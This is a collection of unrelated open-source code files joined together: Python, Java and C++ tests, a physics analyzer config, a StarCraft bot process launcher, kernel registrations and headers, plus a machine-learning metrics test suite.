dist_args = dict(config=CONFIG, rank=rank, world_size=world_size, backend='gloo', port=port, host='localhost')
colossalai.launch(**dist_args)
print('finished initialization')
# build dataset
transform_pipeline = [transforms.ToTensor()]
transform_pipeline = transforms.Compose(transform_pipeline)
dataset = datasets.CIFAR10(root=Path(os.environ['DATA']), train=True, download=True, transform=transform_pipeline)
# build dataloader
dataloader = get_dataloader(dataset, batch_size=8, add_sampler=True)
data_iter = iter(dataloader)
img, label = data_iter.next()
img = img[0]
if gpc.get_local_rank(ParallelMode.DATA) != 0:
img_to_compare = img.clone()
else:
img_to_compare = img
dist.broadcast(img_to_compare, src=0, group=gpc.get_group(ParallelMode.DATA))
if gpc.get_local_rank(ParallelMode.DATA) != 0:
assert not torch.equal(
img, img_to_compare), 'Same image was distributed across ranks but expected it to be different'
torch.cuda.empty_cache()
@pytest.mark.cpu
@rerun_if_address_is_in_use()
def test_data_sampler():
world_size = 4
test_func = partial(run_data_sampler, world_size=world_size, port=free_port())
mp.spawn(test_func, nprocs=world_size)
if __name__ == '__main__':
test_data_sampler()
| 781 |
335 | /*
* Copyright 2019-2021 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.vividus.xray.factory;
import static org.junit.jupiter.api.Assertions.assertEquals;
import java.util.List;
import java.util.Set;
import java.util.function.Supplier;
import org.junit.jupiter.api.Test;
import org.mockito.Mockito;
import org.vividus.bdd.output.ManualTestStep;
import org.vividus.xray.facade.AbstractTestCaseParameters;
import org.vividus.xray.facade.CucumberTestCaseParameters;
import org.vividus.xray.facade.ManualTestCaseParameters;
import org.vividus.xray.model.AbstractTestCase;
import org.vividus.xray.model.CucumberTestCase;
import org.vividus.xray.model.ManualTestCase;
import org.vividus.xray.model.TestCaseType;
class TestCaseFactoryTests
{
private static final String PROJECT_KEY = "project-key";
private static final String ASSIGNEE = "assignee";
private final TestCaseFactory factory = new TestCaseFactory(PROJECT_KEY, ASSIGNEE);
@Test
void shouldCreateManualTestCase()
{
ManualTestStep step = Mockito.mock(ManualTestStep.class);
ManualTestCaseParameters parameters = createTestCaseParameters(TestCaseType.MANUAL,
ManualTestCaseParameters::new);
parameters.setSteps(List.of(step));
ManualTestCase testCase = factory.createManualTestCase(parameters);
assertEquals(List.of(step), testCase.getManualTestSteps());
verifyTestCase(parameters, testCase);
}
@Test
void shouldCreateCucumberTestCase()
{
CucumberTestCaseParameters parameters = createTestCaseParameters(TestCaseType.CUCUMBER,
CucumberTestCaseParameters::new);
parameters.setScenarioType("scenario-type");
parameters.setScenario("scenario");
CucumberTestCase testCase = factory.createCucumberTestCase(parameters);
assertEquals(parameters.getScenarioType(), testCase.getScenarioType());
assertEquals(parameters.getScenario(), testCase.getScenario());
verifyTestCase(parameters, testCase);
}
private void verifyTestCase(AbstractTestCaseParameters parameters, AbstractTestCase testCase)
{
assertEquals(PROJECT_KEY, testCase.getProjectKey());
assertEquals(ASSIGNEE, testCase.getAssignee());
assertEquals(parameters.getLabels(), testCase.getLabels());
assertEquals(parameters.getComponents(), testCase.getComponents());
assertEquals(parameters.getSummary(), testCase.getSummary());
}
@SuppressWarnings("unchecked")
private static <T extends AbstractTestCaseParameters> T createTestCaseParameters(TestCaseType type,
Supplier<T> factory)
{
AbstractTestCaseParameters testCase = factory.get();
testCase.setType(type);
testCase.setSummary("summary");
testCase.setLabels(Set.of("labels-1"));
testCase.setComponents(Set.of("components-1"));
return (T) testCase;
}
}
| 1,227 |
1,091 | /*
* Copyright (c) 2015-2020, Oracle and/or its affiliates. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.tribuo.data.csv;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.tribuo.data.columnar.ColumnarIterator;
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
public class CSVIteratorTest {
private URI path;
private URI noHeaderPath;
private URI quotePath;
private URI tsvPath;
private URI doubleLineBreak;
private List<ColumnarIterator.Row> pathReference;
private List<String> headers;
@BeforeEach
public void setUp() throws URISyntaxException {
path = getClass().getResource("/org/tribuo/data/csv/test.csv").toURI();
noHeaderPath = getClass().getResource("/org/tribuo/data/csv/test-noheader.csv").toURI();
quotePath = getClass().getResource("/org/tribuo/data/csv/testQuote.csv").toURI();
tsvPath = getClass().getResource("/org/tribuo/data/csv/testQuote.tsv").toURI();
doubleLineBreak = getClass().getResource("/org/tribuo/data/csv/test-double-line-break.csv").toURI();
headers = Arrays.asList("A B C D RESPONSE".split(" "));
pathReference = new ArrayList<>();
Map<String, String> rVals = new HashMap<>();
rVals.put("A", "1");
rVals.put("B", "2");
rVals.put("C", "3");
rVals.put("D", "4");
rVals.put("RESPONSE", "monkey");
pathReference.add(new ColumnarIterator.Row(0, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "2");
rVals.put("B", "5");
rVals.put("C", "3");
rVals.put("D", "4");
rVals.put("RESPONSE", "monkey");
pathReference.add(new ColumnarIterator.Row(1, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "1");
rVals.put("B", "2");
rVals.put("C", "5");
rVals.put("D", "9");
rVals.put("RESPONSE", "baboon");
pathReference.add(new ColumnarIterator.Row(2, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "3");
rVals.put("B", "5");
rVals.put("C", "8");
rVals.put("D", "4");
rVals.put("RESPONSE", "monkey");
pathReference.add(new ColumnarIterator.Row(3, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "6");
rVals.put("B", "7");
rVals.put("C", "8");
rVals.put("D", "9");
rVals.put("RESPONSE", "baboon");
pathReference.add(new ColumnarIterator.Row(4, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "0");
rVals.put("B", "7");
rVals.put("C", "8");
rVals.put("D", "9");
rVals.put("RESPONSE", "baboon");
pathReference.add(new ColumnarIterator.Row(5, headers, rVals));
}
@Test
public void testCsvReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(path);
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
@Test
public void testQuotedCsvReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(quotePath);
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
@Test
public void testNoHeaderReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(noHeaderPath, CSVIterator.SEPARATOR, CSVIterator.QUOTE, headers);
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
@Test
public void testQuotedTsvReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(tsvPath, '\t', '|');
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
@Test
public void testDoubleLineBreakReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(doubleLineBreak);
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
}
| 3,094 |
852 | import FWCore.ParameterSet.Config as cms
diJetAnalyzer = cms.EDAnalyzer(
'DiJetAnalyzer',
pfJetCollName = cms.string('DiJetsProd:ak4PFJetsCHS'),
pfJetCorrName = cms.string('ak4PFCHSL1FastL2L3'),
hbheRecHitName = cms.string('DiJetsProd:hbhereco'),
hfRecHitName = cms.string('DiJetsProd:hfreco'),
hoRecHitName = cms.string('DiJetsProd:horeco'),
pvCollName = cms.string('DiJetsProd:offlinePrimaryVertices'),
rootHistFilename = cms.string('dijettree.root'),
maxDeltaEta = cms.double(1.5),
minTagJetEta = cms.double(0.0),
maxTagJetEta = cms.double(5.0),
minSumJetEt = cms.double(50.),
minJetEt = cms.double(20.),
maxThirdJetEt = cms.double(75.),
debug = cms.untracked.bool(False)
)
| 447 |
2,828 | <reponame>tamaashu/curator<filename>curator-x-discovery-server/src/test/java/org/apache/curator/x/discovery/server/jetty_jersey/ServiceDetails.java<gh_stars>1000+
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.curator.x.discovery.server.jetty_jersey;
import com.fasterxml.jackson.annotation.JsonRootName;
import java.util.HashMap;
import java.util.Map;
/**
* Service payload describing details of a service.
*/
@JsonRootName("details")
public class ServiceDetails {
private Map<String, String> data;
private String description;
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
public ServiceDetails() {
this(new HashMap<String, String>());
}
public ServiceDetails(Map<String, String> data) {
this.data = data;
}
public void setData(Map<String, String> data) {
this.data = data;
}
public Map<String, String> getData() {
return data;
}
@Override
public int hashCode() {
final int prime = 31;
int result = 1;
result = prime * result + ((data == null) ? 0 : data.hashCode());
result = prime * result
+ ((description == null) ? 0 : description.hashCode());
return result;
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (getClass() != obj.getClass())
return false;
ServiceDetails other = (ServiceDetails) obj;
if (data == null) {
if (other.data != null)
return false;
} else if (!data.equals(other.data))
return false;
if (description == null) {
if (other.description != null)
return false;
} else if (!description.equals(other.description))
return false;
return true;
}
}
| 796 |
629 | /*
* Copyright (c) 2017-present, Facebook, Inc.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
#include "openbwprocess.h"
#include "utils.h"
#include <common/fsutils.h>
#include <torchcraft/client.h>
#include <array>
#include <cstdlib>
#include <fcntl.h>
#include <signal.h>
#ifndef WITHOUT_POSIX
#include <poll.h>
#include <sys/socket.h>
#include <unistd.h>
#endif // WITHOUT_POSIX
#include <cereal/archives/binary.hpp>
#include <cereal/types/vector.hpp>
#include <fmt/format.h>
#include <glog/logging.h>
#include <prettyprint/prettyprint.hpp>
namespace fsutils = common::fsutils;
DEFINE_string(
bwapilauncher_directory,
"",
"Directory where to find BWAPILauncher. If empty will use PATH");
extern char** environ;
namespace cherrypi {
namespace {
int constexpr kPollTimeout = 1000;
int constexpr kMaxTimedoutPolls = 10;
auto constexpr kDtorGraceTime = std::chrono::milliseconds(500);
bool isExiting = false; // Dont start new forks if this is true
const std::unordered_map<std::string, std::string> versionMap_ = {
{"420", ""},
{"412", "-4.1.2"},
{"374", "-3.7.4"},
};
const std::unordered_map<std::string, std::string> raceMap_ = {
{"Z", "Zerg"},
{"P", "Protoss"},
{"T", "Terran"},
};
struct AIInfo {
AIInfo(std::string const& bot) {
if (bot.empty()) {
auto bwenvPath = getenv("BWENV_PATH");
if (bwenvPath != nullptr) {
aipath = bwenvPath;
} else {
#ifdef __APPLE__
std::vector tryPaths = {
"build/3rdparty/torchcraft/BWEnv/BWEnv.dylib",
"3rdparty/torchcraft/BWEnv/BWEnv.dylib",
};
#else
std::vector tryPaths = {
"build/3rdparty/torchcraft/BWEnv/BWEnv.so",
"3rdparty/torchcraft/BWEnv/BWEnv.so",
};
#endif
aipath = "";
for (auto const& p : tryPaths) {
if (fsutils::exists(p)) {
aipath = p;
}
}
if (aipath.empty()) {
throw std::runtime_error(fmt::format(
"Unable to find BWEnv library. Tried {}",
common::joinVector(tryPaths, ',')));
}
}
ainame = "BWEnv";
} else {
if (bot.find(".dll") == std::string::npos) {
throw std::runtime_error("Cannot play with non-dll bots");
}
auto basename = fsutils::basename(bot, ".dll");
auto splits = utils::stringSplit(basename, '_', 2);
if (splits.size() != 3) {
throw std::runtime_error(
"Bot name must be VERSION_RACE_NAME, like 412_T_Ironbot.dll");
}
auto versionPrefix = versionMap_.find(splits[0]);
if (versionPrefix == versionMap_.end()) {
throw std::runtime_error(
"Version must be 374, 412, or 420, not " + splits[0]);
}
bwapisuffix = versionPrefix->second;
auto race = raceMap_.find(splits[1]);
if (race == raceMap_.end()) {
throw std::runtime_error("Race must be P, T, or Z, not " + splits[1]);
}
airace = race->second;
auto aiPathPrefix =
versionPrefix->second.size() == 0 ? "" : "/starcraft/bwloader.so:";
aipath = aiPathPrefix + bot;
ainame = splits.back();
if (!fsutils::exists("msvcrt.dll")) {
throw std::runtime_error(
"You don't have the DLLs for running bots available! ");
}
}
}
std::string aipath;
std::string ainame;
std::string bwapisuffix;
std::string airace;
};
std::string generateBwapiCommand(AIInfo const& aiinfo) {
auto bwapicmd = "BWAPILauncher" + aiinfo.bwapisuffix;
if (!FLAGS_bwapilauncher_directory.empty()) {
bwapicmd = FLAGS_bwapilauncher_directory + "/" + bwapicmd;
if (!fsutils::exists(bwapicmd)) {
auto fallback = fsutils::which("BWAPILauncher" + aiinfo.bwapisuffix);
LOG(WARNING) << "No such file " << bwapicmd << ". Falling back to "
<< fallback;
bwapicmd = std::move(fallback);
}
}
if (fsutils::which(bwapicmd).empty()) {
throw std::runtime_error(fmt::format(
"No such executable: {}. Please add BWAPILauncher to the PATH, or "
"specify its directory with -bwapilauncher_directory",
bwapicmd));
}
return bwapicmd;
}
} // namespace
OpenBwProcess::OpenBwProcess(std::vector<cherrypi::EnvVar> const& vars)
: OpenBwProcess("", vars) {}
OpenBwProcess::OpenBwProcess(
std::string bot,
std::vector<cherrypi::EnvVar> const& vars) {
#ifdef WITHOUT_POSIX
throw std::runtime_error("OpenBwProcess: Not implemented");
#else // WITHOUT_POSIX
if (isExiting) {
throw std::runtime_error("OpenBwProcess: exit in progress");
}
AIInfo aiinfo(bot);
std::string bwapicmd = generateBwapiCommand(aiinfo);
socketPath_ = fsutils::mktemp("cherrypi-openbwprocess.socket");
// Set a couple of default variables
std::vector<cherrypi::EnvVar> env = {
{"OPENBW_ENABLE_UI", "0", false},
{"TORCHCRAFT_FILE_SOCKET", socketPath_.c_str(), true},
{"BWAPI_CONFIG_AUTO_MENU__CHARACTER_NAME", aiinfo.ainame.c_str(), true},
{"BWAPI_CONFIG_AUTO_MENU__AUTO_MENU", "SINGLE_PLAYER", true},
{"BWAPI_CONFIG_AUTO_MENU__GAME_TYPE", "USE_MAP_SETTINGS", true},
{"BWAPI_CONFIG_AUTO_MENU__AUTO_RESTART", "OFF", true},
};
// Users shouldn't be able to change these...
std::vector<cherrypi::EnvVar> postEnv = {
{"BWAPI_CONFIG_AI__AI", aiinfo.aipath.c_str(), true},
};
if (aiinfo.airace.size() != 0) {
postEnv.push_back(
{"BWAPI_CONFIG_AUTO_MENU__RACE", aiinfo.airace.c_str(), true});
}
env.insert(env.end(), vars.begin(), vars.end());
env.insert(env.end(), postEnv.begin(), postEnv.end());
fork_ = ForkServer::instance().execute({bwapicmd}, env);
if (bot == "") {
running_.store(true);
goodf_ = goodp_.get_future();
outputThread_ =
std::async(std::launch::async, &OpenBwProcess::redirectOutput, this);
}
#endif // WITHOUT_POSIX
}
OpenBwProcess::~OpenBwProcess() {
#ifndef WITHOUT_POSIX
running_.store(false);
// This write should wake up the redirection thread if it's polling
if (write(fork_.wfd, "\0", 1) < 0) {
// We don't really care
}
// Give the process a bit of time to exit by itself so it can e.g. write
// replays at the end of the game.
auto waitUntil = hires_clock::now() + kDtorGraceTime;
do {
if (kill(fork_.pid, 0) != 0 && errno == ESRCH) {
break;
}
std::this_thread::sleep_for(std::chrono::milliseconds(20));
} while (hires_clock::now() < waitUntil);
if (outputThread_.valid()) {
outputThread_.wait();
}
if (socketPath_.size() > 0) {
fsutils::rmrf(socketPath_);
int err = errno;
if (fsutils::exists(socketPath_)) {
VLOG(0) << "Unable to remove " << socketPath_ << " "
<< google::StrError(err);
} else {
VLOG(2) << socketPath_ << " successfully deleted";
}
}
#endif // !WITHOUT_POSIX
}
bool OpenBwProcess::connect(torchcraft::Client* client, int timeoutMs) {
if (goodf_.valid()) {
VLOG(2) << "Trying to connect to " << socketPath_;
auto good = [&]() {
// Make sure we call get() on the future so that exceptions are properly
// propagated
if (timeoutMs < 0) {
goodf_.get();
return true;
} else {
if (goodf_.wait_for(std::chrono::milliseconds(timeoutMs)) !=
std::future_status::ready) {
return false;
}
goodf_.get();
return true;
}
}();
if (good) {
VLOG(2) << "Connected to " << socketPath_;
return client->connect(socketPath_, timeoutMs);
}
}
return false;
}
/// Reads the BWEnv port and logs all BWAPILauncher output (-v 2)
void OpenBwProcess::redirectOutput() {
#ifndef WITHOUT_POSIX
common::setCurrentThreadName("redirectOutput");
std::array<char, 256> buf;
std::vector<char> linebuf(buf.size());
size_t lpos = 0;
bool readSocket = false;
// Make pipe to BWAPILauncher process non-blocking; use poll() instead.
int flags = fcntl(fork_.fd, F_GETFL, 0);
flags |= O_NONBLOCK;
fcntl(fork_.fd, F_SETFL, flags);
struct pollfd pfd;
pfd.fd = fork_.fd;
pfd.events = POLLIN;
int numTimedoutPolls = 0;
while (running_.load()) {
// Check if child process is still alive
if (kill(fork_.pid, 0) != 0 && errno == ESRCH) {
VLOG(1) << "BWAPILauncher(" << fork_.pid << ") is gone";
if (!readSocket) {
goodp_.set_exception(std::make_exception_ptr(std::runtime_error(
"BWAPILauncher(" + std::to_string(fork_.pid) +
") died prematurely")));
}
break;
}
// Poll for new data on pipe
auto pret = poll(&pfd, 1, kPollTimeout);
if (pret < 0) {
if (errno == EINTR) {
VLOG(4) << "Polling was interrupted";
continue;
}
LOG(ERROR) << "Error polling BWAPILauncher pipe: "
<< google::StrError(errno);
if (!readSocket) {
goodp_.set_exception(std::make_exception_ptr(
std::runtime_error("Error reading BWAPILauncher output")));
}
break;
} else if (pret == 0) {
VLOG(4) << "Poll timeout";
if (++numTimedoutPolls >= kMaxTimedoutPolls && !readSocket) {
goodp_.set_exception(std::make_exception_ptr(
std::runtime_error("Timeout parsing BWAPILauncher output")));
break;
}
continue;
} else if (!(pfd.revents & POLLIN)) {
VLOG(4) << "No data available";
continue;
}
numTimedoutPolls = 0;
// Process each line individually for convenience
char sockPath[4096];
auto readline = [&](char const* line) {
if (!strncasecmp(line, "Error:", 6)) {
LOG(ERROR) << "BWAPILauncher(" << fork_.pid << "): " << line;
} else {
VLOG(2) << "BWAPILauncher(" << fork_.pid << "): " << line;
}
if (!readSocket &&
std::sscanf(
line, "TorchCraft server listening on socket %s", sockPath) > 0) {
goodp_.set_value();
readSocket = true;
}
};
// Read available data
ssize_t nread = 0;
while (true) {
nread = read(fork_.fd, buf.data(), buf.size());
if (nread <= 0) {
break;
}
ssize_t pos = 0;
while (pos < nread) {
if (lpos >= linebuf.size()) {
linebuf.resize(linebuf.size() + buf.size());
}
if (buf[pos] == '\n') {
linebuf[lpos] = '\0';
readline(linebuf.data());
lpos = 0;
pos++;
} else {
linebuf[lpos++] = buf[pos++];
}
}
}
if (nread < 0 && errno != EAGAIN) {
LOG(ERROR) << "Error reading from BWAPILauncher pipe: " << errno;
if (!readSocket) {
goodp_.set_exception(std::make_exception_ptr(std::system_error(
errno,
std::system_category(),
"Error reading BWAPILauncher output")));
}
break;
} else if (nread == 0) {
VLOG(2) << "EOF while reading from BWAPILauncher pipe";
break;
} else if (readSocket && std::string(sockPath) != socketPath_) {
goodp_.set_exception(
std::make_exception_ptr(std::runtime_error(fmt::format(
"Expected socket path {}, got {}", socketPath_, sockPath))));
break;
}
}
#endif
}
void OpenBwProcess::preventFurtherProcesses() {
isExiting = true;
}
} // namespace cherrypi
| 5,062 |
17,085 | /* Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */
#include "paddle/fluid/operators/randperm_op.h"
#include "paddle/fluid/framework/op_registry.h"
template <typename T>
using kernel =
paddle::operators::RandpermKernel<paddle::platform::NPUDeviceContext, T>;
REGISTER_OP_NPU_KERNEL(randperm, kernel<int64_t>, kernel<int>, kernel<float>,
kernel<double>);
| 291 |
483 | <reponame>anharismail/EasyNavigation
//
// NavSystemSlidingViewController.h
// EasyNavigationDemo
//
// Created by Mr_Chen on 17/9/15.
// Copyright © 2017年 chenliangloveyou. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface NavSystemSlidingViewController : UIViewController
@end
| 106 |
4,538 | <gh_stars>1000+
/*
* Copyright (C) 2015-2020 Alibaba Group Holding Limited
*/
#ifndef GIDITAL_OUTPUT_H
#define GIDITAL_OUTPUT_H
#include "stdint.h"
#include "aos/hal/gpio.h"
enum en_do_port {
DO_PORT_0 = 0,
DO_PORT_1,
DO_PORT_2,
DO_PORT_3,
DO_PORT_SIZE
};
int32_t expansion_board_do_init(void);
int32_t expansion_board_do_high(uint8_t port);
int32_t expansion_board_do_low(uint8_t port);
#endif | 196 |
1,362 | <gh_stars>1000+
from __future__ import absolute_import, print_function, division, unicode_literals
import unittest
import numpy as np
from sklearn.datasets import load_iris, load_breast_cancer, load_boston
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.model_selection import cross_val_predict
from xcessiv import functions
from xcessiv.presets import metricsetting
clf = LogisticRegression(random_state=8)
multiclass_X, multiclass_y = load_iris(return_X_y=True)
multiclass_preds = cross_val_predict(clf, multiclass_X, multiclass_y, method='predict')
multiclass_probas = cross_val_predict(clf, multiclass_X, multiclass_y, method='predict_proba')
binary_X, binary_y = load_breast_cancer(return_X_y=True)
binary_preds = cross_val_predict(clf, binary_X, binary_y, method='predict')
binary_probas = cross_val_predict(clf, binary_X, binary_y, method='predict_proba')
regression_X, regression_y = load_boston(return_X_y=True)
reg = LinearRegression()
regression_preds = cross_val_predict(reg, regression_X, regression_y, method='predict')
class TestAccuracyFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.accuracy_from_scores['source'])
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.95
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.95
del module
class TestAccuracyFromPreds(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.accuracy_from_preds['source'])
assert np.round(module.metric_generator(binary_y, binary_preds), 2) == 0.95
assert np.round(module.metric_generator(multiclass_y, multiclass_preds), 2) == 0.95
del module
class TestRecallFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.recall_from_scores['source'])
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.97
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.95
del module
class TestRecallFromPreds(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.recall_from_preds['source'])
assert np.round(module.metric_generator(binary_y, binary_preds), 2) == 0.97
assert np.round(module.metric_generator(multiclass_y, multiclass_preds), 2) == 0.95
del module
class TestPrecisionFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.precision_from_scores['source'])
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.95
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.95
del module
class TestPrecisionFromPreds(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.precision_from_preds['source'])
assert np.round(module.metric_generator(binary_y, binary_preds), 2) == 0.95
assert np.round(module.metric_generator(multiclass_y, multiclass_preds), 2) == 0.95
del module
class TestF1ScoreFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.f1_score_from_scores['source'])
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.96
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.95
del module
class TestF1ScoreFromPreds(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.f1_score_from_preds['source'])
assert np.round(module.metric_generator(binary_y, binary_preds), 2) == 0.96
assert np.round(module.metric_generator(multiclass_y, multiclass_preds), 2) == 0.95
del module
class TestROCAUCFromScores(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(
metricsetting.roc_auc_score_from_scores['source']
)
assert np.round(module.metric_generator(binary_y, binary_probas), 2) == 0.99
assert np.round(module.metric_generator(multiclass_y, multiclass_probas), 2) == 0.99
del module
class TestMAE(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.mae['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == 6.99
del module
class TestMSE(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.mse['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == 168.09
del module
class TestMedianAbsoluteError(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.median_absolute_error['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == 3.72
del module
class TestR2Score(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.r2_score['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == -0.99
del module
class TestExplainedVarianceScore(unittest.TestCase):
def test_source(self):
module = functions.import_string_code_as_module(metricsetting.explained_variance_score['source'])
assert np.round(module.metric_generator(regression_y, regression_preds), 2) == -0.89
del module
| 2,290 |
428 | <filename>src/cpp/f00295_gamegeom.hpp
class GameGeom {
private:
// passed to GPU, transformed
FIVector4 boundsMinInPixels;
FIVector4 boundsMaxInPixels;
FIVector4 visMinInPixels;
FIVector4 visMaxInPixels;
public:
// passed to GPU
FIVector4 geomParams[E_GP_LENGTH];
// enum E_GEOM_PARAMS {
// E_GP_BOUNDSMININPIXELST,
// E_GP_BOUNDSMAXINPIXELST,
// E_GP_VISMININPIXELST,
// E_GP_VISMAXINPIXELST,
// E_GP_CORNERDISINPIXELS,
// E_GP_POWERVALS,
// E_GP_POWERVALS2,
// E_GP_THICKVALS,
// E_GP_MATPARAMS,
// E_GP_LENGTH
// }
// geomParams[E_GP_BOUNDSMININPIXELST]
// geomParams[E_GP_BOUNDSMAXINPIXELST]
// geomParams[E_GP_VISMININPIXELST]
// geomParams[E_GP_VISMAXINPIXELST]
// geomParams[E_GP_CORNERDISINPIXELS]
// geomParams[E_GP_POWERVALS]
// geomParams[E_GP_POWERVALS2]
// geomParams[E_GP_THICKVALS]
// geomParams[E_GP_MATPARAMS]
// FIVector4 boundsMinInPixelsT;
// FIVector4 boundsMaxInPixelsT;
// FIVector4 visMinInPixelsT;
// FIVector4 visMaxInPixelsT;
// FIVector4 cornerDisInPixels;
// FIVector4 powerVals;
// FIVector4 powerVals2;
// FIVector4 thickVals;
// FIVector4 matParams;
// internal use
FIVector4 anchorPointInPixels;
FIVector4 moveMinInPixels;
FIVector4 moveMaxInPixels;
GameLight *light;
bool visible;
bool hasAnchor;
bool isToggled;
// 1
// 2 0
// 3
int rotDir;
int minRot;
